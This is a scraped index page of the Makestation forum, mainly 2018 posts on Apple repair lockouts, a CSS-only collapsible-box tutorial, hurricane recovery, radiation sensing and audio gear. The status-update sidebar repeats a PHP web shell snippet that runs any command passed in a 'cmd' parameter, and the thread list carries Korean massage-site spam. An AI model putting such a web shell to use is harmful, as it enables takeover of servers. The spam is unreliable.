Welcome, Guest
Welcome to Makestation! We are a creative arts/indie discussion community — Your center for creative arts discussion, unleashed!

Please note that you must log in to participate in discussions on the forum. If you do not have an account, you can create one here. We hope you enjoy the forum!

Status Updates
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
View all updates

Search Forums

(Advanced Search)

Forum Statistics
» Members: 1,216
» Latest member: gullj
» Forum threads: 56,976
» Forum posts: 81,401

Full Statistics

Online Users
There are currently 950 online users.
» 2 Member(s) | 947 Guest(s)
Google, e.uni.cedi.men.r.o, s.at.r.eo.p.alsen

Latest Threads
남양주오피 ⦑오피사이트.NET⦒ 남양주마사지 ...
Forum: The Others
Last Post: s.at.r.eo.p.alsen
Less than 1 minute ago
» Replies: 0
» Views: 1
세종1인샵【오피쓰주소.COM】세종안마 세...
Forum: The Others
Last Post: e.uni.cedi.men.r.o
Less than 1 minute ago
» Replies: 0
» Views: 1
수원오피 ⦑출장마사지안내.COM⦒ 수원OP 수...
Forum: The Others
Last Post: s.at.r.eo.p.alsen
1 minute ago
» Replies: 0
» Views: 1
포항스웨디시【출장마사지안내.COM】포항 스웨디...
Forum: The Others
Last Post: e.uni.cedi.men.r.o
2 minutes ago
» Replies: 0
» Views: 1
역삼오피 역삼오피 ⦑오피사이트.NET⦒ 역삼O...
Forum: The Others
Last Post: s.at.r.eo.p.alsen
3 minutes ago
» Replies: 0
» Views: 3
부산안마【오피쓰.COM】부산안마 부...
Forum: The Others
Last Post: e.uni.cedi.men.r.o
3 minutes ago
» Replies: 0
» Views: 3
산본오피 ⦑오피쓰주소.COM⦒ 산본OP 산본오...
Forum: The Others
Last Post: s.at.r.eo.p.alsen
4 minutes ago
» Replies: 0
» Views: 3

 
  Apple is now blocking any third party repairs (mostly)
Posted by: Darth-Apple - October 5th, 2018 at 4:58 AM - Forum: Technology & Hardware - Replies (2)

Apple has long been known to have fostered a somewhat greedy ecosystem in many respects when it comes to profits. And this has been compounded over the past few years. Think about the removal of the headphone jack on the iphones (the new ones don't even come with a dongle anymore) and the $70 fast charger that is not even included with new iPhones. Then it was the macbooks that had extremely pricey keyboard repairs and no ports, requiring a dongle to convert a single USB C port to any other port that you would need. 

And now... they will be bricked and rendered useless if a third party repair to a screen, SSD, memory, or anything else is done to the computer. They are doing this by requiring a proprietary system diagnostics system to be run after a hardware repair, which is something only Apple will have access to. 

And it's honestly unfortunate for a few reasons. Firstly, cost. Screen repairs alone at Apple will cost several hundred dollars, whereas a local shop can easily do one for less than $150. Secondly, old macs are generally considered legacy after five or six years, meaning Apple themselves won't even repair it. Mine is six years old. It will probably be considered legacy soon. 

I love macs to death. I truly do. But my computer is getting a bit old. I hate the 1280x800 screen, it has had RAM problems (which I fixed by removing a bad stick, thereby slowing down my computer and running RAM in single channel mode), and has a 3rd generation i5 that can't really handle Mojave that well and is no good for any kind of gaming whatsoever. I'd love to get a new one, but I'm almost unsure of what I would replace it with. The new macbooks are almost impossible to repair, very expensive, have no ports, and have keyboards that are unusually hard to type on. 

Looks like I'm either getting a 2015 air (actually not a bad computer), or just sticking with this one. Not quite ready to go back to a PC yet, but for the time being, not sure the Mac is going to be a better option in the long term either. 

Source: https://www.theverge.com/2018/10/4/17938...t-software

Print this item

  Collapsible boxes using only CSS and HTML
Posted by: SpookyZalost - October 4th, 2018 at 2:53 PM - Forum: Resources & Tutorials - Replies (2)

So for the past few days I've been tinkering with ways to make my own website more efficient, especially the tech mods section because that's going to have a lot of content and scrolling through it all to get to what you want might be a bit tedius.  Because of this I've been searching for a few days on how to create collasible boxes.  The main problem I ran into is that most sources say "use javascript, you have to use javascript, etc." However I found a source that actually gave explanations on how to use HTML and CSS only to create one.

This turned out to work really well, so well I've decided to share the details and any minor tweaks I made to make it suit better for columns and such.

now originally my CSS looked a little something like this.

Code:
<style>
* {
   box-sizing: border-box;

.textbox {
 background: rgba(0,0,0,0.7);
   border: 2px inset #54fbe5; /* Cyberpunk blue */
     border-radius: 20px;
     -moz-border-radius:20px;
         -webkit-transition-duration: 0.4s; /* Safari */
         padding:10px 10px;
}
}

that is the CSS I used to make the text boxes work and when combined with the following HTML it made the site's cool design work well without sacrificing text visibility

Code:
<div class="textbox">
   <center><h2>Header</h2></center>
   <p>Lorum Ipsum Textboxum contentium</p>
   </div>

that HTML then had to be used for each "box" that had to be entered on the site.

as you can imagine this would look rather cluttered with full size postings taking up entire sections of the page.

well... 

[Image: SsaColu.png]

Having thought about it I had a tough decision to make... should I add Javascript to my site?
it's currently using no JS at all!, surprising I know right?

then I sumbled Upon this happy bit of CSS code right here.

Code:
.wrap-collabsible {
margin-bottom: 1.2rem 0;
}

input[type='checkbox'] {
display: none;
}

.lbl-toggle {
display: block;

font-family: "Courier New", Courier, monospace;
font-size: 20px;
letter-spacing: 0px;
word-spacing: -5px;
font-weight: 700;
text-decoration: none solid rgb(68, 68, 68);
font-style: normal;
font-variant: normal;
text-transform: none;
  padding: 8px;
  margin: 8px;
text-align: center;

padding: 1rem;

background: rgba(0,0,0,0.7);

cursor: pointer;

  border: 2px inset #54fbe5; /* Cyberpunk blue */
    border-radius: 20px;
transition: all 0.25s ease-out;
}

.lbl-toggle:hover {
color: #54fbe5;
}

.lbl-toggle::before {
content: ' ';
display: inline-block;

border-top: 5px solid transparent;
border-bottom: 5px solid transparent;
border-left: 5px solid currentColor;
vertical-align: middle;
margin-right: .7rem;
transform: translateY(-2px);

transition: transform .2s ease-out;
}

.toggle:checked + .lbl-toggle::before {
transform: rotate(90deg) translateX(-3px);
}

.collapsible-content {
max-height: 0px;
overflow: hidden;
transition: max-height .25s ease-in-out;
}

.toggle:checked + .lbl-toggle + .collapsible-content {
max-height: 5000px;
}

.toggle:checked + .lbl-toggle {
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}

.collapsible-content .content-inner {
background: rgba(250, 224, 66, .2);
border-bottom: 1px solid rgba(250, 224, 66, .45);
border-bottom-left-radius: 7px;
border-bottom-right-radius: 7px;
padding: .5rem 1rem;
}

now basically what that does is tells the CSS style sheet and HTML how to make a button which expands and collapses a box.

Code:
   <div class="column content">
   <div class="wrap-collabsible">
 <input id="collapsiblenumber" class="toggle" type="checkbox">
 <label for="collapsiblenumber" class="lbl-toggle">More Info</label>
 <div class="collapsible-content">
   <div class="content-inner">
     <p>
       QUnit is by calling one of the object that are embedded in JavaScript, and faster JavaScript program could also used with
       its elegant, well documented, and functional programming using JS, HTML pages Modernizr is a popular browsers without
       plug-ins. Test-Driven Development.
     </p>
   </div>
 </div>
</div>

then the above HTML code would make that button visible on the page.

I however tweaked this a bit.

Code:
<div class="wrap-collabsible">
 <input id="collapsible1" class="toggle" type="checkbox">
 <label for="collapsible1" class="lbl-toggle">Button Label/Post title</label>
 <div class="collapsible-content">
   <div class="textbox">
<p> Insert Conent here </p>
   </div>
  </div>
</div>

the main changes I made was to make the <div class="content-inner"> into <div class="textbox"> Thus converting the button's style into the one I had been using for my textboxes.

the end result?

[Image: vrkKQ0S.png]

[Image: dQB5CiE.png]

No Javascript required.

also a heads up you need to label each collapsible box like so 
 <input id="collapsible1" class="toggle" type="checkbox">
 <label for="collapsible1" class="lbl-toggle">Button Label/Post title</label>

 <input id="collapsible2" class="toggle" type="checkbox">
 <label for="collapsible2" class="lbl-toggle">Button Label/Post title</label>

 <input id="collapsible3" class="toggle" type="checkbox">
 <label for="collapsible3" class="lbl-toggle">Button Label/Post title</label>

otherwise you'll end up having one button open the wrong box, or all the boxes.

hope that was informative.

Zalost - Out.

Print this item

  New Apartment
Posted by: Darth-Apple - October 3rd, 2018 at 4:34 AM - Forum: Lifestyle - Replies (9)

After having my place of residence more or less destroyed by the hurricane, I have now finally moved into temporary housing and have a new place to live for the next couple of months while they rebuild. I also have internet once more, so I should be around a little more from the days coming forward without having to use a slow hotspot to connect. 

Being "homeless" (and by homeless, I mean staying with friends) is not the most fun thing in the world. It makes you thankful for the things in life that you do have, and manages to put things in perspective a bit. 

Oh, and I also got some monetary assistance from FEMA. Definitely very helpful during this time. Finna

Print this item

  A blast from the past
Posted by: Darth-Apple - September 21st, 2018 at 3:10 AM - Forum: Community Related - Replies (2)

Forgive a screenshot that leaves a lot to be desired (internet and computer knocked out during hurricane). But I got this from the Wayback machine, and this is from the original make station, powered by none other than SMF in 2013. Thought it might be interesting to share, for those who might be interested!

Edit: it looked better then. It wasn’t missing so many images. Still a heathy dose of nostalgia and a beautiful reminder of our past. Finna 

[Image: dCpuf.png]

Print this item

Question Radiation sensing
Posted by: Conundrum - September 17th, 2018 at 6:37 PM - Forum: Technology & Hardware - Replies (6)

Hi, had some intriguing ideas today.

As many people might be aware, there is a global network of radiation/environmental sensors called uRADMonitor.

I had a thought, could they be supplemented with more accurate timekeeping so that gamma ray flashes (TGFs) can be tracked as well
as overall radiation level?

TGFs are believed to originate from electron-positron annihilation events inside thunderstorms as well as conventional X-rays.

The detector grid would need to be synchronized to a few us to get any sort of useful data on these, ideally using something like an MSF/Droitwich radio  similar to the ones used in weather stations.
In this case each "node" would also have an OCXO or similar with its reference used to "tag" detected events.
This would also provide precise details of location using basic triangulation with each sensor position known via web interface.

Anyone have any ideas please?

-A

Print this item

  Home Listening
Posted by: Thomas - September 4th, 2018 at 4:04 AM - Forum: Technology & Hardware - Replies (3)

What are your home audio setups?

In my bedroom at my desk I have a Logitech z906 5.1 setup, but I mostly listen through my Sennheiser HD650s with a Fiio e10k dac/amp.
In my living room I have a Yamaha R-S202 stereo receiver and some shitty Sony 30 watt home theatre speakers hooked up to it. I've also got an Audio-Technica LP60 record player.

Print this item

  [Tutorial] Mega Amp Install and tutorial
Posted by: SpookyZalost - August 31st, 2018 at 1:18 PM - Forum: Resources & Tutorials - No Replies

I know it's been a long wait but it's finally done, the genesis mega amp install tutorial and review video!



Feel free to ask any questions and I'll do my best to answer them.

Print this item

  We have returned to the web
Posted by: Darth-Apple - August 26th, 2018 at 2:44 AM - Forum: Announcements - Replies (2)

My hugest apologies for the downtime everyone! We are back online, and rest assured, we are sticking around for the long haul! 

Our host did some critical software patches to mitigate some of the Intel CPU security vulnerabilities, and they had to restart every VPS in the process. Unfortunately that reboot screwed ours up in the process, and left our website down for a fairly substantial part of the day. 

Rest assured we are back, and everything is in good working order once again!

Print this item

  New Mechkeybo
Posted by: Thomas - August 22nd, 2018 at 7:35 PM - Forum: Technology & Hardware - Replies (18)

I bought a new mechanical keyboard. The Vortex Race 3, to replace my Pok3r.

[Image: ZJZKjca.jpg]

Something that I really liked about my Pok3r was using FN + I J K L as arrow keys, so I've programmed this one to do it too and now I'm in love.

Print this item

  Zalost's Gridzone
Posted by: SpookyZalost - August 22nd, 2018 at 9:44 AM - Forum: Other Communites & Promotion - Replies (38)

Greetings, Zalost here, I've been tinkering a bit on a personal website of mine, and while it's far from finished I've got it working well enough that I feel it's probably ok to share now.

https://zalost.neocities.org/index.html

go ahead, check it out, there's still some empty areas that I will fill in as I find stuff to put there, and if you have any suggestions feel free to let me know and I'll see about adding them to the site.

Print this item


Dark/Light Theme Selector

Contact Us | Makestation | Return to Top | Lite (Archive) Mode | RSS Syndication 
Proudly powered by MyBB 1.8, © 2002-2025
Forum design by Makestation Team © 2013-2025